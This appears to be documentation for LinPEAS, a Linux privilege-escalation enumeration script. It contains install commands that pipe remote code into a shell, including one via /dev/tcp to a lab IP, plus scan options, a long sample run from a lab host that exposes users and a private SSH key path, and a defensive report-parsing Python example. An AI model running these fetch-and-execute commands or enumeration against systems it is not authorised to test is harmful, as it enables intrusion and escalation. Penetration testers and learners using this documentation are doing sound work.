LinPEAS
Description
LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix* hosts.
Installation
From github
$ curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh
Local network
$ python -m SimpleHTTPServer 80
$ curl 10.10.10.10/linpeas.sh | sh
Without curl
$ nc -q 5 -lvnp 80 < linpeas.sh
$ cat < /dev/tcp/10.10.10.10/80 | sh
Output to file
$ linpeas -a > /dev/shm/linpeas.txt
$ less -r /dev/shm/linpeas.txt
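A saved report still contains the colour escape sequences (hence `less -r`), so it needs cleaning before it can be searched or diffed. The following is an added example, not part of LinPEAS or of the original page: it splits a report in the layout shown under Example (v2.5.0) into sections and checks, then compares the SUID list with an expected baseline. The names `parse_report`, `suid_findings` and `BASELINE`, and the sample lines including the colour codes, are constructed for illustration.

```python
import re

# Patterns for the plain-text layout shown in this page's Example (linpeas v2.5.0).
ANSI_RE = re.compile(r"\x1b\[[0-9;]*m")             # colour escapes kept in the saved file
SECTION_RE = re.compile(r"^=+\(\s*(.+?)\s*\)=+$")   # ====( System Information )====
CHECK_RE = re.compile(r"^\[\+\]\s*(.+)$")           # [+] Sudo version
LEADER_RE = re.compile(r"\s*\.{3,}\s*")             # "Is ASLR enabled? ...... Yes"
NOTE_RE = re.compile(r"^(\S+)\s+--->\s+(.+)$")      # /usr/bin/at ---> <note>


def parse_report(text):
    """Return {section: {check title: [result lines]}} for a saved report."""
    report = {}
    section = check = None
    for raw in text.splitlines():
        line = ANSI_RE.sub("", raw).strip()
        if not line or line.startswith("[i]"):      # skip blanks and hint URLs
            continue
        m = SECTION_RE.match(line)
        if m:
            section, check = m.group(1), None
            report[section] = {}
            continue
        if section is None:                         # banner, legend, advisory
            continue
        m = CHECK_RE.match(line)
        if m:
            # One-line checks carry their answer after a dot leader.
            parts = LEADER_RE.split(m.group(1), maxsplit=1)
            check = parts[0]
            inline = parts[1] if len(parts) == 2 and parts[1] else None
            report[section][check] = [inline] if inline else []
            continue
        if check is not None:
            report[section][check].append(line)
    return report


def suid_findings(report, baseline):
    """List SUID binaries with their '--->' note and whether the baseline expects them.

    The note is a match on the binary's name and states the platform or version
    it refers to, which may not be the scanned host, so treat it as a prompt to
    check the installed version rather than as a confirmed finding.
    """
    lines = []
    for checks in report.values():
        for title, body in checks.items():
            if title.startswith("SUID"):
                lines = body
    findings = []
    for line in lines:
        m = NOTE_RE.match(line)
        path, note = (m.group(1), m.group(2)) if m else (line.split()[0], None)
        findings.append({"path": path, "note": note, "in_baseline": path in baseline})
    return findings


# Constructed sample in the page's output format; the colour codes are illustrative.
SAMPLE = "\n".join([
    "linpeas v2.5.0 by carlospolop",
    "====================================( System Information )====================================",
    "\x1b[1;34m[+] \x1b[1;32mSudo version\x1b[0m",
    "[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version",
    "Sudo version 1.8.16",
    "[+] Is this a container? .......... No",
    "[+] Is ASLR enabled? .............. Yes",
    "====================================( Interesting Files )=====================================",
    "[+] SUID - Check easy privesc, exploits and write perms",
    "/usr/bin/vim.basic",
    "/usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)",
    "/bin/su",
    "[+] SGID",
    "/usr/bin/crontab",
])

# Hypothetical allowlist of SUID binaries expected on this build.
BASELINE = {"/bin/su", "/usr/bin/at"}

if __name__ == "__main__":
    parsed = parse_report(SAMPLE)
    for item in suid_findings(parsed, BASELINE):
        status = "expected" if item["in_baseline"] else "NOT IN BASELINE"
        print(f"{item['path']:<22} {status:<16} {item['note'] or ''}")
```
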
Options
- -h: To show this message
- -q: Do not show banner
- -a: All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly
- -s: SuperFast (don't check some time consuming checks) - Stealth mode
- -w: Wait execution between big blocks
- -n: Do not export env variables related with history
- -o: Only execute selected checks (SysI, Devs, AvaSof, ProCronSrvcs, Net, UsrI, SofI, IntFiles). Select a comma separated list.
- -d <IP/NETMASK>: Discover hosts using fping or ping. Ex: -d 192.168.0.1/24
- -p <PORT(s)> -d <IP/NETMASK>: Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports. Ex: -d 192.168.0.1/24 -p 53,139
- -i <IP> [-p <PORT(s)>]: Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
Notice that if you select some network action, no PE check will be performed
Example
$ ./linpeas.sh -a | tee linepeas.txt
linpeas v2.5.0 by carlospolop
ADVISORY: linpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 99% a PE vector
RED: You must take a look at it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMangeta: Your username
====================================( Basic information )=====================================
OS: Linux version 4.4.0-119-generic (buildd@lcy01-amd64-013) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
User & Groups: uid=1001(jan) gid=1001(jan) groups=1001(jan)
Hostname: basic2
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
====================================( System Information )====================================
[+] Operative system
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.4.0-119-generic (buildd@lcy01-amd64-013) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
Distributor ID: Ubuntu
Description: Ubuntu 16.04.4 LTS
Release: 16.04
Codename: xenial
[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.16
[+] PATH
[i] Any writable folder in original PATH? (a new completed path will be exported)
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
[+] Date
Thu Apr 30 04:22:33 EDT 2020
[+] System stats
Filesystem Size Used Avail Use% Mounted on
udev 224M 0 224M 0% /dev
tmpfs 49M 3.3M 46M 7% /run
/dev/xvda1 14G 2.4G 11G 19% /
tmpfs 244M 4.0K 244M 1% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 244M 0 244M 0% /sys/fs/cgroup
tmpfs 49M 0 49M 0% /run/user/1001
total used free shared buff/cache available
Mem: 498068 103444 160196 1712 234428 353216
Swap: 1045500 145340 900160
[+] Environment
[i] Any private information inside environment variables?
HISTFILESIZE=0
MAIL=/var/mail/jan
SSH_CLIENT=10.9.35.106 51288 22
USER=jan
SHLVL=1
HOME=/home/jan
SSH_TTY=/dev/pts/0
LOGNAME=jan
_=./linpeas.sh
XDG_SESSION_ID=3
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
HISTSIZE=0
SHELL=/bin/bash
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_CONNECTION=10.9.35.106 51288 10.10.226.157 22
HISTFILE=/dev/null
[+] Looking for Signature verification failed in dmseg
Not Found
[+] selinux enabled? .............. sestatus Not Found
[+] Printer? ...................... lpstat Not Found
[+] Is this a container? .......... No
[+] Is ASLR enabled? .............. Yes
=========================================( Devices )==========================================
[+] Any sd* disk in /dev? (limit 20)
[+] Unmounted file-system?
[i] Check if you can mount umounted devices
UUID=cdbcec40-cb66-49dd-ad6b-be757c8140cf / ext4 errors=remount-ro 0 1
UUID=db3bdca8-5517-4600-b896-e8479e05e44a none swap sw 0 0
====================================( Available Software )====================================
[+] Useful software
/bin/nc
/bin/netcat
/bin/nc.traditional
/usr/bin/wget
/usr/bin/curl
/bin/ping
/usr/bin/base64
/usr/bin/python
/usr/bin/python2
/usr/bin/python3
/usr/bin/python2.7
/usr/bin/perl
/usr/bin/sudo
[+] Installed Compiler
/usr/share/gcc-5
================================( Processes, Cron, Services & Timers )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
daemon 849 0.0 0.3 26044 1956 ? Ss 02:35 0:00 /usr/sbin/atd -f
jan 14284 0.0 0.4 4704 2052 pts/0 S+ 04:22 0:00 /bin/sh ./linpeas.sh -a
jan 14285 0.0 0.1 7296 668 pts/0 S+ 04:22 0:00 tee linepeas.txt
jan 14477 0.0 0.6 37364 3280 pts/0 R+ 04:22 0:00 ps aux
jan 14479 0.0 0.1 15808 772 pts/0 S+ 04:22 0:00 sort
jan 2266 0.0 0.6 45276 3028 ? Ss 04:16 0:00 /lib/systemd/systemd --user
jan 2269 0.0 0.3 61540 1664 ? S 04:16 0:00 (sd-pam)
jan 2301 0.0 0.7 92832 3620 ? S 04:16 0:00 sshd: jan@pts/0
jan 2302 0.0 1.0 22572 5088 pts/0 Ss 04:16 0:00 -bash
message+ 824 0.0 0.7 42952 3560 ? Ss 02:35 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 1012 0.0 0.0 5220 116 ? Ss 02:36 0:00 /sbin/iscsid
root 1013 0.0 0.7 5720 3516 ? S<Ls 02:36 0:00 /sbin/iscsid
root 1 0.2 0.8 38088 4416 ? Ss 02:35 0:18 /sbin/init
root 1110 0.0 0.3 15936 1568 tty1 Ss+ 02:36 0:00 /sbin/agetty --noclear tty1 linux
root 1111 0.0 0.3 15752 1952 ttyS0 Ss+ 02:36 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
root 1142 0.0 0.7 71584 3592 ? Ss 02:36 0:00 /usr/sbin/apache2 -k start
root 1224 0.0 0.7 240008 3932 ? Ss 02:36 0:00 /usr/sbin/nmbd -D
root 356 0.0 0.6 27704 3000 ? Ss 02:35 0:01 /lib/systemd/systemd-journald
root 395 0.0 0.2 94772 1272 ? Ss 02:35 0:00 /sbin/lvmetad -f
root 411 0.0 0.7 44696 3612 ? Ss 02:35 0:02 /lib/systemd/systemd-udevd
root 811 0.0 0.6 28620 3012 ? Ss 02:35 0:00 /lib/systemd/systemd-logind
root 814 0.0 0.5 29008 2692 ? Ss 02:35 0:00 /usr/sbin/cron -f
root 830 0.0 0.8 275896 4252 ? Ssl 02:35 0:00 /usr/lib/accountsservice/accounts-daemon
root 837 0.0 2.0 277936 10024 ? Ssl 02:35 0:00 /usr/lib/snapd/snapd
root 841 0.0 0.5 636820 2724 ? Ssl 02:35 0:04 /usr/bin/lxcfs /var/lib/lxcfs/
root 846 0.0 0.1 4396 812 ? Ss 02:35 0:00 /usr/sbin/acpid
root 872 0.0 0.7 277176 3956 ? Ssl 02:35 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 873 0.0 0.0 13372 144 ? Ss 02:35 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root 890 0.0 1.1 337920 5668 ? Ss 02:36 0:00 /usr/sbin/smbd -D
root 902 0.0 0.7 329804 3628 ? S 02:36 0:00 /usr/sbin/smbd -D
root 921 0.0 0.5 16124 2496 ? Ss 02:36 0:00 /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root 961 0.0 0.8 337920 4072 ? S 02:36 0:00 /usr/sbin/smbd -D
root 981 0.0 0.8 65508 4224 ? Ss 02:36 0:00 /usr/sbin/sshd -D
syslog 851 0.0 0.5 256392 2756 ? Ssl 02:35 0:00 /usr/sbin/rsyslogd -n
systemd+ 493 0.0 0.4 100324 2268 ? Ssl 02:35 0:00 /lib/systemd/systemd-timesyncd
tomcat9 994 2.1 9.5 2539580 47444 ? Sl 02:36 2:18 /usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat-latest/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Dfile.encoding=UTF-8 -Dnet.sf.ehcache.skipUpdateCheck=true -XX:+UseConcMarkSweepGC -XX:+CMSClassUnloadingEnabled -XX:+UseParNewGC -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512m -Xmx512m -Dignore.endorsed.dirs= -classpath /opt/tomcat-latest/bin/bootstrap.jar:/opt/tomcat-latest/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat-latest -Dcatalina.home=/opt/tomcat-latest -Djava.io.tmpdir=/opt/tomcat-latest/temp org.apache.catalina.startup.Bootstrap start
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
www-data 1145 0.0 0.8 820212 4132 ? Sl 02:36 0:02 /usr/sbin/apache2 -k start
www-data 1146 0.0 0.7 623628 3896 ? Sl 02:36 0:02 /usr/sbin/apache2 -k start
[+] Binary processes permissions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
0 lrwxrwxrwx 1 root root 4 Apr 17 2018 /bin/sh -> dash
1.6M -rwxr-xr-x 1 root root 1.6M Mar 8 2018 /lib/systemd/systemd
320K -rwxr-xr-x 1 root root 319K Mar 8 2018 /lib/systemd/systemd-journald
608K -rwxr-xr-x 1 root root 605K Mar 8 2018 /lib/systemd/systemd-logind
140K -rwxr-xr-x 1 root root 139K Mar 8 2018 /lib/systemd/systemd-timesyncd
444K -rwxr-xr-x 1 root root 443K Mar 8 2018 /lib/systemd/systemd-udevd
44K -rwxr-xr-x 1 root root 44K Nov 30 2017 /sbin/agetty
476K -rwxr-xr-x 1 root root 476K Mar 5 2018 /sbin/dhclient
0 lrwxrwxrwx 1 root root 20 Mar 8 2018 /sbin/init -> /lib/systemd/systemd
768K -rwxr-xr-x 1 root root 766K Jul 26 2017 /sbin/iscsid
52K -rwxr-xr-x 1 root root 51K Apr 16 2016 /sbin/lvmetad
504K -rwxr-xr-x 1 root root 502K Nov 8 2017 /sbin/mdadm
220K -rwxr-xr-x 1 root root 219K Jan 12 2017 /usr/bin/dbus-daemon
20K -rwxr-xr-x 1 root root 19K Nov 8 2017 /usr/bin/lxcfs
164K -rwxr-xr-x 1 root root 162K Nov 3 2016 /usr/lib/accountsservice/accounts-daemon
0 lrwxrwxrwx 1 root root 15 Mar 14 2018 /usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -> ../jre/bin/java
16K -rwxr-xr-x 1 root root 15K Jan 17 2016 /usr/lib/policykit-1/polkitd
21M -rwxr-xr-x 1 root root 21M Nov 30 2017 /usr/lib/snapd/snapd
48K -rwxr-xr-x 1 root root 47K Apr 8 2016 /usr/sbin/acpid
648K -rwxr-xr-x 1 root root 647K Sep 18 2017 /usr/sbin/apache2
28K -rwxr-xr-x 1 root root 27K Jan 14 2016 /usr/sbin/atd
44K -rwxr-xr-x 1 root root 44K Apr 5 2016 /usr/sbin/cron
244K -rwxr-xr-x 1 root root 243K Mar 7 2018 /usr/sbin/nmbd
588K -rwxr-xr-x 1 root root 586K Apr 5 2016 /usr/sbin/rsyslogd
72K -rwxr-xr-x 1 root root 71K Mar 7 2018 /usr/sbin/smbd
776K -rwxr-xr-x 1 root root 773K Jan 18 2018 /usr/sbin/sshd
[+] Different processes executed during 1 min (interesting is low number of repetitions)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs
[+] Cron jobs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-jobs
-rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rw-r--r-- 1 root root 190 Apr 17 2018 popularity-contest
/etc/cron.daily:
total 64
drwxr-xr-x 2 root root 4096 Apr 19 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rwxr-xr-x 1 root root 539 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 376 Mar 31 2016 apport
-rwxr-xr-x 1 root root 1474 Jun 19 2017 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 6 2015 logrotate
-rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
-rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest
-rwxr-xr-x 1 root root 383 Mar 7 2016 samba
-rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
[+] Services
[i] Search for outdated versions
[ + ] acpid
[ + ] apache-htcacheclean
[ + ] apache2
[ + ] apparmor
[ + ] apport
[ + ] atd
[ - ] bootmisc.sh
[ - ] checkfs.sh
[ - ] checkroot-bootclean.sh
[ - ] checkroot.sh
[ + ] console-setup
[ + ] cron
[ - ] cryptdisks
[ - ] cryptdisks-early
[ + ] dbus
[ + ] grub-common
[ - ] hostname.sh
[ - ] hwclock.sh
[ + ] irqbalance
[ + ] iscsid
[ + ] keyboard-setup
[ - ] killprocs
[ + ] kmod
[ - ] lvm2
[ + ] lvm2-lvmetad
[ + ] lvm2-lvmpolld
[ + ] lxcfs
[ - ] lxd
[ + ] mdadm
[ - ] mdadm-waitidle
[ - ] mountall-bootclean.sh
[ - ] mountall.sh
[ - ] mountdevsubfs.sh
[ - ] mountkernfs.sh
[ - ] mountnfs-bootclean.sh
[ - ] mountnfs.sh
[ + ] networking
[ + ] nmbd
[ + ] ondemand
[ + ] open-iscsi
[ - ] open-vm-tools
[ - ] plymouth
[ - ] plymouth-log
[ + ] procps
[ + ] rc.local
[ + ] resolvconf
[ - ] rsync
[ + ] rsyslog
[ + ] samba
[ + ] samba-ad-dc
[ - ] screen-cleanup
[ - ] sendsigs
[ + ] smbd
[ + ] ssh
[ + ] udev
[ + ] ufw
[ - ] umountfs
[ - ] umountnfs.sh
[ - ] umountroot
[ + ] unattended-upgrades
[ + ] urandom
[ - ] uuidd
[ - ] x11-common
[+] System timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Thu 2020-04-30 06:08:42 EDT 1h 44min left Thu 2020-04-30 02:35:53 EDT 1h 47min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Thu 2020-04-30 16:05:00 EDT 11h left Thu 2020-04-30 02:35:53 EDT 1h 47min ago apt-daily.timer apt-daily.service
Fri 2020-05-01 02:50:42 EDT 22h left Thu 2020-04-30 02:50:42 EDT 1h 33min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2020-05-04 01:14:13 EDT 3 days left Thu 2020-04-30 03:38:42 EDT 45min ago snapd.refresh.timer snapd.refresh.service
n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service
n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service
===================================( Network Information )====================================
[+] Hostname, hosts and DNS
basic2
127.0.0.1 localhost
127.0.1.1 basic2
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 10.0.0.2
search eu-west-1.compute.internal
[+] Content of /etc/inetd.conf & /etc/xinetd.conf
/etc/inetd.conf Not Found
[+] Networks and neighbours
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0 Link encap:Ethernet HWaddr 02:c0:e9:ff:bc:ac
inet addr:10.10.226.157 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::c0:e9ff:feff:bcac/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:110790 errors:0 dropped:0 overruns:0 frame:0
TX packets:107628 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:10296501 (10.2 MB) TX bytes:19616371 (19.6 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:228 errors:0 dropped:0 overruns:0 frame:0
TX packets:228 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:16416 (16.4 KB) TX bytes:16416 (16.4 KB)
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default ip-10-10-0-1.eu 0.0.0.0 UG 0 0 0 eth0
10.10.0.0 * 255.255.0.0 U 0 0 0 eth0
[+] Iptables rules
iptables rules Not Found
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#internal-open-ports
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 3828 10.10.226.157:22 10.9.35.106:51288 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::445 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN -
tcp6 0 0 :::8009 :::* LISTEN -
tcp6 0 0 :::139 :::* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
udp 0 0 10.10.255.255:137 0.0.0.0:* -
udp 0 0 10.10.226.157:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.10.255.255:138 0.0.0.0:* -
udp 0 0 10.10.226.157:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 0.0.0.0:50228 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
[+] Can I sniff with tcpdump?
No
====================================( Users Information )=====================================
[+] My user
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#groups
uid=1001(jan) gid=1001(jan) groups=1001(jan)
[+] Do I have PGP keys?
gpg Not Found
[+] Clipboard or highlighted text?
xsel and xclip Not Found
[+] Testing 'sudo -l' without password & /etc/sudoers
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
[+] Checking /etc/doas.conf
/etc/doas.conf Not Found
[+] Checking Pkexec policy
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
[+] Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds
It's not possible to brute-force su.
[+] Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
[+] Superusers
root:x:0:0:root:/root:/bin/bash
[+] Users with console
jan:x:1001:1001::/home/jan:/bin/bash
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash
root:x:0:0:root:/root:/bin/bash
[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(kay) gid=1000(kay) groups=1000(kay),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
uid=1001(jan) gid=1001(jan) groups=1001(jan)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=999(tomcat9) gid=999(tomcat9) groups=999(tomcat9)
uid=9(news) gid=9(news) groups=9(news)
[+] Login now
04:23:46 up 1:48, 1 user, load average: 0.29, 0.24, 0.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jan pts/0 10.9.35.106 04:16 1:14 0.24s 0.00s w
[+] Last logons
kay tty1 Wed Apr 18 09:20 - down (00:05)
reboot system boot 4.4.0-119-generi Tue Apr 17 13:45 - 09:25 (19:39)
kay tty1 Wed Apr 18 09:02 - crash (-19:-16)
reboot system boot 4.4.0-119-generi Tue Apr 17 13:27 - 09:25 (19:58)
kay tty1 Tue Apr 17 13:21 - crash (00:05)
reboot system boot 4.4.0-119-generi Tue Apr 17 13:14 - 09:25 (20:10)
kay tty1 Tue Apr 17 13:05 - down (00:08)
reboot system boot 4.4.0-87-generic Tue Apr 17 13:00 - 13:14 (00:14)
wtmp begins Tue Apr 17 13:00:02 2018
[+] Last time logon each user
Username Port From Latest
kay pts/0 192.168.56.102 Mon Apr 23 16:04:07 -0400 2018
jan pts/0 10.9.35.106 Thu Apr 30 04:16:21 -0400 2020
[+] Password policy
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
Caching directories . . . . . . . . . . . . . . . DONE
===================================( Software Information )===================================
[+] MySQL version
mysql Not Found
[+] MySQL connection using default root/root ........... No
[+] MySQL connection using root/toor ................... No
[+] MySQL connection using root/NOPASS ................. No
[+] Looking for mysql credentials and exec
Not Found
[+] PostgreSQL version and pgadmin credentials
Not Found
[+] PostgreSQL connection to template0 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template1 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template0 using pgsql/NOPASS ........... No
[+] PostgreSQL connection to template1 using pgsql/NOPASS ........... No
[+] Apache server info
Version: Server version: Apache/2.4.18 (Ubuntu)
Server built: 2017-09-18T15:09:02
[+] Looking for PHPCookies
Not Found
[+] Looking for Wordpress wp-config.php files
wp-config.php Not Found
[+] Looking for Tomcat users file
tomcat-users.xml Not Found
[+] Mongo information
Not Found
[+] Looking for supervisord configuration file
supervisord.conf Not Found
[+] Looking for cesi configuration file
cesi.conf Not Found
[+] Looking for Rsyncd config file
/usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
[+] Looking for Hostapd config file
hostapd.conf Not Found
[+] Looking for wifi conns file
Not Found
[+] Looking for Anaconda-ks config files
anaconda-ks.cfg Not Found
[+] Looking for .vnc directories and their passwd files
.vnc Not Found
[+] Looking for ldap directories and their hashes
/etc/ldap
The password hash is from the {SSHA} to 'structural'
[+] Looking for .ovpn files and credentials
.ovpn Not Found
[+] Looking for ssl/ssh files
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
Port 22
PermitRootLogin prohibit-password
